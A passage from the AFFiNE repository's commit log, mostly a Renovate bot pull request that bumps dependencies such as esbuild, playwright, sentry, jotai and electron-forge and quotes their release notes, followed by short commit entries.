| [html-validate](https://html-validate.org ) ([source](https://gitlab.com/html-validate/html-validate )) | [`8.22.0` -> `8.23.0`](https://renovatebot.com/diffs/npm/html-validate/8.22.0/8.23.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [jotai](https://redirect.github.com/pmndrs/jotai ) | [`2.9.3` -> `2.10.0`](https://renovatebot.com/diffs/npm/jotai/2.9.3/2.10.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [keyv](https://redirect.github.com/jaredwray/keyv ) | [`5.0.1` -> `5.0.3`](https://renovatebot.com/diffs/npm/keyv/5.0.1/5.0.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [lucide-react](https://lucide.dev ) ([source](https://redirect.github.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.441.0` -> `^0.445.0`](https://renovatebot.com/diffs/npm/lucide-react/0.441.0/0.445.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [msw](https://mswjs.io ) ([source](https://redirect.github.com/mswjs/msw )) | [`2.4.8` -> `2.4.9`](https://renovatebot.com/diffs/npm/msw/2.4.8/2.4.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [napi](https://redirect.github.com/napi-rs/napi-rs ) | `3.0.0-alpha.9` -> `3.0.0-alpha.11` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://redirect.github.com/napi-rs/napi-rs ) | `3.0.0-alpha.8` -> `3.0.0-alpha.11` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [nodemon](https://nodemon.io ) ([source](https://redirect.github.com/remy/nodemon )) | [`3.1.5` -> `3.1.7`](https://renovatebot.com/diffs/npm/nodemon/3.1.5/3.1.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [nx](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.7.4` -> `19.8.0`](https://renovatebot.com/diffs/npm/nx/19.7.4/19.8.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [openai](https://redirect.github.com/openai/openai-node ) | [`4.62.1` -> `4.63.0`](https://renovatebot.com/diffs/npm/openai/4.62.1/4.63.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [playwright](https://playwright.dev ) ([source](https://redirect.github.com/microsoft/playwright )) | [`=1.47.1` -> `=1.47.2`](https://renovatebot.com/diffs/npm/playwright/1.47.1/1.47.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [react-day-picker](https://daypicker.dev ) ([source](https://redirect.github.com/gpbl/react-day-picker )) | [`9.1.0` -> `9.1.2`](https://renovatebot.com/diffs/npm/react-day-picker/9.1.0/9.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [socket.io](https://redirect.github.com/socketio/socket.io/tree/main/packages/socket.io#readme ) ([source](https://redirect.github.com/socketio/socket.io )) | [`4.7.5` -> `4.8.0`](https://renovatebot.com/diffs/npm/socket.io/4.7.5/4.8.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [socket.io-client](https://redirect.github.com/socketio/socket.io/tree/main/packages/socket.io-client#readme ) ([source](https://redirect.github.com/socketio/socket.io )) | [`4.7.5` -> `4.8.0`](https://renovatebot.com/diffs/npm/socket.io-client/4.7.5/4.8.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [storybook](https://redirect.github.com/storybookjs/storybook/tree/next/code/lib/cli ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/lib/cli )) | [`8.3.1` -> `8.3.2`](https://renovatebot.com/diffs/npm/storybook/8.3.1/8.3.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [vite](https://vitejs.dev ) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite )) | [`5.4.6` -> `5.4.7`](https://renovatebot.com/diffs/npm/vite/5.4.6/5.4.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [wrangler](https://redirect.github.com/cloudflare/workers-sdk ) ([source](https://redirect.github.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.78.5` -> `3.78.7`](https://renovatebot.com/diffs/npm/wrangler/3.78.5/3.78.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
---
### Release Notes
<details>
<summary>electron/forge (@​electron-forge/cli)</summary>
### [`v7.5.0`](https://redirect.github.com/electron/forge/releases/tag/v7.5.0 )
[Compare Source](https://redirect.github.com/electron/forge/compare/v7.4.0...v7.5.0 )
##### What's Changed
##### Improved ESM module support
Electron Forge v7.5.0 adds support for loading Forge modules (plugins, makers, publishers etc.) that use ESM for their module format. This change allows both official Forge modules and third-party modules to use ESM syntax.
##### Change in Vite support policy
v7.5.0 also makes refinements to our Vite plugin, fixing an issue that users identified as breaking between 7.2.0 and 7.3.0 ([https://github.com/electron/forge/issues/3506 ](https://redirect.github.com/electron/forge/issues/3506 )). Users upgrading from any past version of Forge to 7.5.0 should now not experience breaking config changes.
After discussion with maintainers, we've decided to retroactively mark the Vite plugin as **experimental**, as the plugin is still under active development and cannot offer the same API stability guarantees as our other existing plugins. Minor versions may include breaking changes to improve developer ergonomics or to fix bugs (especially around native Node.js modules).
When these changes happen, we'll provide additional migration information in future release notes.
- feat(plugin-vite): better logic by [@​caoxiemeihao](https://redirect.github.com/caoxiemeihao ) in [https://github.com/electron/forge/pull/3583 ](https://redirect.github.com/electron/forge/pull/3583 )
- feat(core): support ESM Forge module loading by [@​SpacingBat3](https://redirect.github.com/SpacingBat3 ) in [https://github.com/electron/forge/pull/3582 ](https://redirect.github.com/electron/forge/pull/3582 )
- feat(core): adding register/unregisterForgeConfigForDirectory to utils by [@​IIIMADDINIII](https://redirect.github.com/IIIMADDINIII ) in [https://github.com/electron/forge/pull/3626 ](https://redirect.github.com/electron/forge/pull/3626 )
- feat(publisher-gcs): only include provided upload options by [@​kochrt](https://redirect.github.com/kochrt ) in [https://github.com/electron/forge/pull/3576 ](https://redirect.github.com/electron/forge/pull/3576 )
- feat: Adding optional metadata config to gcs publisher by [@​Tobiasartz](https://redirect.github.com/Tobiasartz ) in [https://github.com/electron/forge/pull/3682 ](https://redirect.github.com/electron/forge/pull/3682 )
- feat(maker-wix): Expose the property associateExtensions by [@​fras2560](https://redirect.github.com/fras2560 ) in [https://github.com/electron/forge/pull/3674 ](https://redirect.github.com/electron/forge/pull/3674 )
- feat(plugin-webpack): support for dev server custom headers by [@​rahul-sachdeva22](https://redirect.github.com/rahul-sachdeva22 ) in [https://github.com/electron/forge/pull/3653 ](https://redirect.github.com/electron/forge/pull/3653 )
##### Bug Fixes and Improvements
- fix(cli): cli capitalisation by [@​DevanceJ](https://redirect.github.com/DevanceJ ) in [https://github.com/electron/forge/pull/3539 ](https://redirect.github.com/electron/forge/pull/3539 )
- ci: don't use versionDocs option in API Documentation workflow by [@​dsanders11](https://redirect.github.com/dsanders11 ) in [https://github.com/electron/forge/pull/3571 ](https://redirect.github.com/electron/forge/pull/3571 )
- test(import): check if electron-quick-start packages by [@​erickzhao](https://redirect.github.com/erickzhao ) in [https://github.com/electron/forge/pull/3580 ](https://redirect.github.com/electron/forge/pull/3580 )
- fix(maker-squirrel): only push `delta` artifacts if they exist on disk by [@​hipstersmoothie](https://redirect.github.com/hipstersmoothie ) in [https://github.com/electron/forge/pull/3586 ](https://redirect.github.com/electron/forge/pull/3586 )
- docs: upgrade typedoc@0.25 by [@​erickzhao](https://redirect.github.com/erickzhao ) in [https://github.com/electron/forge/pull/3636 ](https://redirect.github.com/electron/forge/pull/3636 )
- fix(plugin-webpack): protocol recognizes webpack's `devServer` setting by [@​Dogdriip](https://redirect.github.com/Dogdriip ) in [https://github.com/electron/forge/pull/3650 ](https://redirect.github.com/electron/forge/pull/3650 )
- fix(hooks): allow mutating hooks to have a `void` return by [@​erickzhao](https://redirect.github.com/erickzhao ) in [https://github.com/electron/forge/pull/3655 ](https://redirect.github.com/electron/forge/pull/3655 )
- fix: Bump [@​electron/packager](https://redirect.github.com/electron/packager ) to ^18.3.5 by [@​felixrieseberg](https://redirect.github.com/felixrieseberg ) in [https://github.com/electron/forge/pull/3692 ](https://redirect.github.com/electron/forge/pull/3692 )
- chore: bump electronjs/node to 2.3.0 (main) by [@​electron-roller](https://redirect.github.com/electron-roller ) in [https://github.com/electron/forge/pull/3596 ](https://redirect.github.com/electron/forge/pull/3596 )
- chore(publisher-s3): update aws-sdk deps by [@​erickzhao](https://redirect.github.com/erickzhao ) in [https://github.com/electron/forge/pull/3708 ](https://redirect.github.com/electron/forge/pull/3708 )
- chore: bump `asar` dep to latest by [@​erickzhao](https://redirect.github.com/erickzhao ) in [https://github.com/electron/forge/pull/3592 ](https://redirect.github.com/electron/forge/pull/3592 )
- test: correctly make test-output.xml paths relative in windows by [@​yangannyx](https://redirect.github.com/yangannyx ) in [https://github.com/electron/forge/pull/3620 ](https://redirect.github.com/electron/forge/pull/3620 )
- docs: mark plugin-vite as experimental by [@​VerteDinde](https://redirect.github.com/VerteDinde ) in [https://github.com/electron/forge/pull/3710 ](https://redirect.github.com/electron/forge/pull/3710 )
##### New Contributors
- [@​DevanceJ](https://redirect.github.com/DevanceJ ) made their first contribution in [https://github.com/electron/forge/pull/3539 ](https://redirect.github.com/electron/forge/pull/3539 )
- [@​hipstersmoothie](https://redirect.github.com/hipstersmoothie ) made their first contribution in [https://github.com/electron/forge/pull/3586 ](https://redirect.github.com/electron/forge/pull/3586 )
- [@​Tobiasartz](https://redirect.github.com/Tobiasartz ) made their first contribution in [https://github.com/electron/forge/pull/3682 ](https://redirect.github.com/electron/forge/pull/3682 )
- [@​rahul-sachdeva22](https://redirect.github.com/rahul-sachdeva22 ) made their first contribution in [https://github.com/electron/forge/pull/3653 ](https://redirect.github.com/electron/forge/pull/3653 )
- [@​fras2560](https://redirect.github.com/fras2560 ) made their first contribution in [https://github.com/electron/forge/pull/3674 ](https://redirect.github.com/electron/forge/pull/3674 )
- [@​IIIMADDINIII](https://redirect.github.com/IIIMADDINIII ) made their first contribution in [https://github.com/electron/forge/pull/3626 ](https://redirect.github.com/electron/forge/pull/3626 )
- [@​SpacingBat3](https://redirect.github.com/SpacingBat3 ) made their first contribution in [https://github.com/electron/forge/pull/3582 ](https://redirect.github.com/electron/forge/pull/3582 )
- [@​kochrt](https://redirect.github.com/kochrt ) made their first contribution in [https://github.com/electron/forge/pull/3576 ](https://redirect.github.com/electron/forge/pull/3576 )
**Full Changelog**: https://github.com/electron/forge/compare/v7.4.0...v7.5.0
</details>
<details>
<summary>fal-ai/fal-js (@​fal-ai/serverless-client)</summary>
### [`v0.14.3`](b3ab5f0e15...762f28918d )
[Compare Source](b3ab5f0e15...762f28918d )
</details>
<details>
<summary>microsoft/playwright (@​playwright/test)</summary>
### [`v1.47.2`](https://redirect.github.com/microsoft/playwright/releases/tag/v1.47.2 )
[Compare Source](https://redirect.github.com/microsoft/playwright/compare/v1.47.1...v1.47.2 )
##### Highlights
[https://github.com/microsoft/playwright/pull/32699 ](https://redirect.github.com/microsoft/playwright/pull/32699 )- \[REGRESSION]: fix(codegen): use content_frame property in python/.NET[https://github.com/microsoft/playwright/issues/32706 ](https://redirect.github.com/microsoft/playwright/issues/32706 )6- \[REGRESSION]: page.pause() does not pause test timeout after 1.4[https://github.com/microsoft/playwright/pull/32661 ](https://redirect.github.com/microsoft/playwright/pull/32661 )61 - fix(trace-viewer): time delta between local and remote actions
#### Browser Versions
- Chromium 129.0.6668.29
- Mozilla Firefox 130.0
- WebKit 18.0
This version was also tested against the following stable channels:
- Google Chrome 128
- Microsoft Edge 128
</details>
<details>
<summary>getsentry/sentry-javascript (@​sentry/react)</summary>
### [`v8.31.0`](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/8.31.0 )
[Compare Source](https://redirect.github.com/getsentry/sentry-javascript/compare/8.30.0...8.31.0 )
##### Important Changes
- **feat(node): Add `dataloader` integration ([#​13664](https://redirect.github.com/getsentry/sentry-javascript/issues/13664 ))**
This release adds a new integration for the [`dataloader` package](https://www.npmjs.com/package/dataloader ). The Node
SDK (and all SDKs that depend on it) will now automatically instrument `dataloader` instances. You can also add it
manually:
```js
Sentry.init({
integrations: [Sentry.dataloaderIntegration()],
});
```
##### Other Changes
- feat(browser): Add navigation `activationStart` timestamp to pageload span ([#​13658](https://redirect.github.com/getsentry/sentry-javascript/issues/13658 ))
- feat(gatsby): Add optional `deleteSourcemapsAfterUpload` ([#​13610](https://redirect.github.com/getsentry/sentry-javascript/issues/13610 ))
- feat(nextjs): Give app router prefetch requests a `http.server.prefetch` op ([#​13600](https://redirect.github.com/getsentry/sentry-javascript/issues/13600 ))
- feat(nextjs): Improve Next.js serverside span data quality ([#​13652](https://redirect.github.com/getsentry/sentry-javascript/issues/13652 ))
- feat(node): Add `disableInstrumentationWarnings` option ([#​13693](https://redirect.github.com/getsentry/sentry-javascript/issues/13693 ))
- feat(nuxt): Adding `experimental_basicServerTracing` option to Nuxt module ([#​13643](https://redirect.github.com/getsentry/sentry-javascript/issues/13643 ))
- feat(nuxt): Improve logs about adding Node option 'import' ([#​13726](https://redirect.github.com/getsentry/sentry-javascript/issues/13726 ))
- feat(replay): Add `onError` callback + other small improvements to debugging ([#​13721](https://redirect.github.com/getsentry/sentry-javascript/issues/13721 ))
- feat(replay): Add experimental option to allow for a checkout every 6 minutes ([#​13069](https://redirect.github.com/getsentry/sentry-javascript/issues/13069 ))
- feat(wasm): Unconditionally parse instruction addresses ([#​13655](https://redirect.github.com/getsentry/sentry-javascript/issues/13655 ))
- fix: Ensure all logs are wrapped with `consoleSandbox` ([#​13690](https://redirect.github.com/getsentry/sentry-javascript/issues/13690 ))
- fix(browser): Try multiple options for `lazyLoadIntegration` script parent element lookup ([#​13717](https://redirect.github.com/getsentry/sentry-javascript/issues/13717 ))
- fix(feedback): Actor color applies to feedback icon ([#​13702](https://redirect.github.com/getsentry/sentry-javascript/issues/13702 ))
- fix(feedback): Fix form width on mobile devices ([#​13068](https://redirect.github.com/getsentry/sentry-javascript/issues/13068 ))
- fix(nestjs): Preserve original function name on `SentryTraced` functions ([#​13684](https://redirect.github.com/getsentry/sentry-javascript/issues/13684 ))
- fix(node): Don't overwrite local variables for re-thrown errors ([#​13644](https://redirect.github.com/getsentry/sentry-javascript/issues/13644 ))
- fix(normalize): Treat Infinity as NaN both are non-serializable numbers ([#​13406](https://redirect.github.com/getsentry/sentry-javascript/issues/13406 ))
- fix(nuxt): Use correct server output file path ([#​13725](https://redirect.github.com/getsentry/sentry-javascript/issues/13725 ))
- fix(opentelemetry): Always use active span in `Propagator.inject` ([#​13381](https://redirect.github.com/getsentry/sentry-javascript/issues/13381 ))
- fix(replay): Fixes potential out-of-order segments ([#​13609](https://redirect.github.com/getsentry/sentry-javascript/issues/13609 ))
Work in this release was contributed by [@​KyGuy2002](https://redirect.github.com/KyGuy2002 ), [@​artzhookov](https://redirect.github.com/artzhookov ), and [@​julianCast](https://redirect.github.com/julianCast ). Thank you for your contributions!
</details>
<details>
<summary>storybookjs/storybook (@​storybook/addon-essentials)</summary>
### [`v8.3.2`](https://redirect.github.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#832 )
[Compare Source](https://redirect.github.com/storybookjs/storybook/compare/v8.3.1...v8.3.2 )
- CLI: Fix skip-install for stable latest releases - [#​29133](https://redirect.github.com/storybookjs/storybook/pull/29133 ), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic )!
- Core: Do not add packageManager field to package.json during `storybook dev` - [#​29152](https://redirect.github.com/storybookjs/storybook/pull/29152 ), thanks [@​valentinpalkovic](https://redirect.github.com/valentinpalkovic )!
</details>
<details>
<summary>electron/electron (electron)</summary>
### [`v32.1.2`](https://redirect.github.com/electron/electron/releases/tag/v32.1.2 ): electron v32.1.2
[Compare Source](https://redirect.github.com/electron/electron/compare/v32.1.1...v32.1.2 )
### Release Notes for v32.1.2
#### Fixes
- Fixed an issue where clicking the eyedropper icon did nothing instead of opening an eyedropper for color selection as expected. [#​43786](https://redirect.github.com/electron/electron/pull/43786 ) <span style="font-size:small;">(Also in [33](https://redirect.github.com/electron/electron/pull/43700 ))</span>
- Third time isn't always a charm. Fixed the native macOS Screen Share picker invocation triggering a test Chromium green screen. [#​43809](https://redirect.github.com/electron/electron/pull/43809 ) <span style="font-size:small;">(Also in [33](https://redirect.github.com/electron/electron/pull/43810 ))</span>
</details>
<details>
<summary>evanw/esbuild (esbuild)</summary>
### [`v0.24.0`](https://redirect.github.com/evanw/esbuild/blob/HEAD/CHANGELOG.md#0240 )
[Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.23.1...v0.24.0 )
***This release deliberately contains backwards-incompatible changes.*** To avoid automatically picking up releases like this, you should either be pinning the exact version of `esbuild` in your `package.json` file (recommended) or be using a version range syntax that only accepts patch upgrades such as `^0.23.0` or `~0.23.0`. See npm's documentation about [semver](https://docs.npmjs.com/cli/v6/using-npm/semver/ ) for more information.
- Drop support for older platforms ([#​3902](https://redirect.github.com/evanw/esbuild/pull/3902 ))
This release drops support for the following operating system:
- macOS 10.15 Catalina
This is because the Go programming language dropped support for this operating system version in Go 1.23, and this release updates esbuild from Go 1.22 to Go 1.23. Go 1.23 now requires macOS 11 Big Sur or later.
Note that this only affects the binary esbuild executables that are published to the esbuild npm package. It's still possible to compile esbuild's source code for these older operating systems. If you need to, you can compile esbuild for yourself using an older version of the Go compiler (before Go version 1.23). That might look something like this:
git clone https://github.com/evanw/esbuild.git
cd esbuild
go build ./cmd/esbuild
./esbuild --version
- Fix class field decorators in TypeScript if `useDefineForClassFields` is `false` ([#​3913](https://redirect.github.com/evanw/esbuild/issues/3913 ))
Setting the `useDefineForClassFields` flag to `false` in `tsconfig.json` means class fields use the legacy TypeScript behavior instead of the standard JavaScript behavior. Specifically they use assign semantics instead of define semantics (e.g. setters are triggered) and fields without an initializer are not initialized at all. However, when this legacy behavior is combined with standard JavaScript decorators, TypeScript switches to always initializing all fields, even those without initializers. Previously esbuild incorrectly continued to omit field initializers for this edge case. These field initializers in this case should now be emitted starting with this release.
- Avoid incorrect cycle warning with `tsconfig.json` multiple inheritance ([#​3898](https://redirect.github.com/evanw/esbuild/issues/3898 ))
TypeScript 5.0 introduced multiple inheritance for `tsconfig.json` files where `extends` can be an array of file paths. Previously esbuild would incorrectly treat files encountered more than once when processing separate subtrees of the multiple inheritance hierarchy as an inheritance cycle. With this release, `tsconfig.json` files containing this edge case should work correctly without generating a warning.
- Handle Yarn Plug'n'Play stack overflow with `tsconfig.json` ([#​3915](https://redirect.github.com/evanw/esbuild/issues/3915 ))
Previously a `tsconfig.json` file that `extends` another file in a package with an `exports` map could cause a stack overflow when Yarn's Plug'n'Play resolution was active. This edge case should work now starting with this release.
- Work around more issues with Deno 1.31+ ([#​3917](https://redirect.github.com/evanw/esbuild/pull/3917 ))
This version of Deno broke the `stdin` and `stdout` properties on command objects for inherited streams, which matters when you run esbuild's Deno module as the entry point (i.e. when `import.meta.main` is `true`). Previously esbuild would crash in Deno 1.31+ if you ran esbuild like that. This should be fixed starting with this release.
This fix was contributed by [@​Joshix-1](https://redirect.github.com/Joshix-1 ).
</details>
<details>
<summary>html-validate/html-validate (html-validate)</summary>
### [`v8.23.0`](https://gitlab.com/html-validate/html-validate/blob/HEAD/CHANGELOG.md#8230-2024-09-22 )
[Compare Source](https://gitlab.com/html-validate/html-validate/compare/v8.22.0...v8.23.0 )
##### Features
- **deps:** support vitest v2 ([860b0c0](860b0c0251 ))
</details>
<details>
<summary>pmndrs/jotai (jotai)</summary>
### [`v2.10.0`](https://redirect.github.com/pmndrs/jotai/releases/tag/v2.10.0 )
[Compare Source](https://redirect.github.com/pmndrs/jotai/compare/v2.9.3...v2.10.0 )
It comes with another significant internal change to address some edge cases.
Since v2.9.0, we've been working on some internal refactors to support more edge cases and clean up the code.
Users are encouraged to update to the new versions eventually, but if you're satisfied with the current situation and prefer to avoid temporary instability, you can stick with v2.8.4 for now.
#### What's Changed
- breaking(core): avoid continuable promise in store api by [@​dai-shi](https://redirect.github.com/dai-shi ) in [https://github.com/pmndrs/jotai/pull/2695 ](https://redirect.github.com/pmndrs/jotai/pull/2695 )
#### New Contributors
- [@​sphinxrave](https://redirect.github.com/sphinxrave ) made their first contribution in [https://github.com/pmndrs/jotai/pull/2653 ](https://redirect.github.com/pmndrs/jotai/pull/2653 )
- [@​mxthxngx](https://redirect.github.com/mxthxngx ) made their first contribution in [https://github.com/pmndrs/jotai/pull/2712 ](https://redirect.github.com/pmndrs/jotai/pull/2712 )
- [@​hoangvu12](https://redirect.github.com/hoangvu12 ) made their first contribution in [https://github.com/pmndrs/jotai/pull/2716 ](https://redirect.github.com/pmndrs/jotai/pull/2716 )
- [@​YuHyeonWook](https://redirect.github.com/YuHyeonWook ) made their first contribution in [https://github.com/pmndrs/jotai/pull/2734 ](https://redirect.github.com/pmndrs/jotai/pull/2734 )
**Full Changelog**: https://github.com/pmndrs/jotai/compare/v2.9.3...v2.10.0
</details>
<details>
<summary>lucide-icons/lucide (lucide-react)</summary>
### [`v0.445.0`](https://redirect.github.com/lucide-icons/lucide/releases/tag/0.445.0 ): New icons 0.445.0
[Compare Source](https://redirect.github.com/lucide-icons/lucide/compare/0.444.0...0.445.0 )
#### New icons 🎨
- `briefcase-conveyor-belt` ([#​2431](https://redirect.github.com/lucide-icons/lucide/issues/2431 )) by [@​jguddas](https://redirect.github.com/jguddas )
- `message-square-lock` ([#​2430](https://redirect.github.com/lucide-icons/lucide/issues/2430 )) by [@​jguddas](https://redirect.github.com/jguddas )
### [`v0.444.0`](https://redirect.github.com/lucide-icons/lucide/releases/tag/0.444.0 ): New icons 0.444.0
[Compare Source](https://redirect.github.com/lucide-icons/lucide/compare/0.443.0...0.444.0 )
#### Modified Icons 🔨
- `loader-pinwheel` ([#​2470](https://redirect.github.com/lucide-icons/lucide/issues/2470 )) by [@​jguddas](https://redirect.github.com/jguddas )
### [`v0.443.0`](https://redirect.github.com/lucide-icons/lucide/releases/tag/0.443.0 ): New icons 0.443.0
[Compare Source](https://redirect.github.com/lucide-icons/lucide/compare/0.442.0...0.443.0 )
#### Modified Icons 🔨
- `circle-stop` ([#​2479](https://redirect.github.com/lucide-icons/lucide/issues/2479 )) by [@​jguddas](https://redirect.github.com/jguddas )
### [`v0.442.0`](https://redirect.github.com/lucide-icons/lucide/releases/tag/0.442.0 ): New icons 0.442.0
[Compare Source](https://redirect.github.com/lucide-icons/lucide/compare/0.441.0...0.442.0 )
#### Modified Icons 🔨
- `messages-square` ([#​2429](https://redirect.github.com/lucide-icons/lucide/issues/2429 )) by [@​jguddas](https://redirect.github.com/jguddas )
- `octagon-pause` ([#​2485](https://redirect.github.com/lucide-icons/lucide/issues/2485 )) by [@​jguddas](https://redirect.github.com/jguddas )
</details>
<details>
<summary>mswjs/msw (msw)</summary>
### [`v2.4.9`](https://redirect.github.com/mswjs/msw/releases/tag/v2.4.9 )
[Compare Source](https://redirect.github.com/mswjs/msw/compare/v2.4.8...v2.4.9 )
#### v2.4.9 (2024-09-20)
##### Bug Fixes
- **ClientRequest:** support `Request` as init when recording raw headers ([#​2293](https://redirect.github.com/mswjs/msw/issues/2293 )) ([`bf982ea`](bf982eaa70 )) [@​kettanaito](https://redirect.github.com/kettanaito )
</details>
<details>
<summary>napi-rs/napi-rs (napi)</summary>
### [`v3.0.0-alpha.11`](https://redirect.github.com/napi-rs/napi-rs/releases/tag/napi%403.0.0-alpha.11 )
[Compare Source](https://redirect.github.com/napi-rs/napi-rs/compare/napi@3.0.0-alpha.10...napi@3.0.0-alpha.11 )
#### What's Changed
- refactor(napi-derive): expand order by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn ) in [https://github.com/napi-rs/napi-rs/pull/2265 ](https://redirect.github.com/napi-rs/napi-rs/pull/2265 )
**Full Changelog**: https://github.com/napi-rs/napi-rs/compare/napi-derive@3.0.0-alpha.9...napi@3.0.0-alpha.11
### [`v3.0.0-alpha.10`](https://redirect.github.com/napi-rs/napi-rs/releases/tag/napi%403.0.0-alpha.10 )
[Compare Source](https://redirect.github.com/napi-rs/napi-rs/compare/napi@3.0.0-alpha.9...napi@3.0.0-alpha.10 )
#### What's Changed
- fix(napi): nullptr handling in `TypedArray`s by [@​Xanewok](https://redirect.github.com/Xanewok ) in [https://github.com/napi-rs/napi-rs/pull/2258 ](https://redirect.github.com/napi-rs/napi-rs/pull/2258 )
- chore: enable corepack in Debian base Dockerfile by [@​stevefan1999-personal](https://redirect.github.com/stevefan1999-personal ) in [https://github.com/napi-rs/napi-r
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguODAuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-24 10:39:39 +00:00
Yifeng Wang
a77061e848
feat: add block visibility config ( #8371 )
2024-09-24 17:36:06 +08:00
github-actions[bot]
3d9a777acd
New Crowdin Translations ( #8366 )
...
Co-authored-by: Crowdin Bot <support+bot@crowdin.com >
2024-09-24 16:49:31 +08:00
CatsJuice
929124d9e2
chore(core): update pro plan description ( #8367 )
2024-09-24 07:08:43 +00:00
EYHN
73876f60fc
feat(core): adjust offline mode description ( #8365 )
2024-09-24 05:58:15 +00:00
JimmFly
a99b7fd857
chore: remove page settings from appearance settings ( #8350 )
2024-09-24 04:27:07 +00:00
JimmFly
75bc6df915
fix(core): unexpected routing history appears on the shared page ( #8356 )
...
close AF-1429
https://github.com/user-attachments/assets/a99cf79d-3615-4e0f-835c-2e66b1a34863
2024-09-24 04:02:07 +00:00
CatsJuice
9eae3de1ae
fix(mobile): scroll optimization ( #8362 )
...
close AF-1421, AF-1418, AF-1423, AF-1358
2024-09-24 03:51:09 +00:00
github-actions[bot]
e02d450e4f
New Crowdin Translations ( #8364 )
...
Co-authored-by: Crowdin Bot <support+bot@crowdin.com >
2024-09-24 03:41:57 +00:00
pengx17
d0f04d22f5
fix(core): fix preview mode ( #8349 )
2024-09-24 02:17:08 +00:00
pengx17
a430367c36
fix(electron): remove active tab shadow ( #8284 )
...
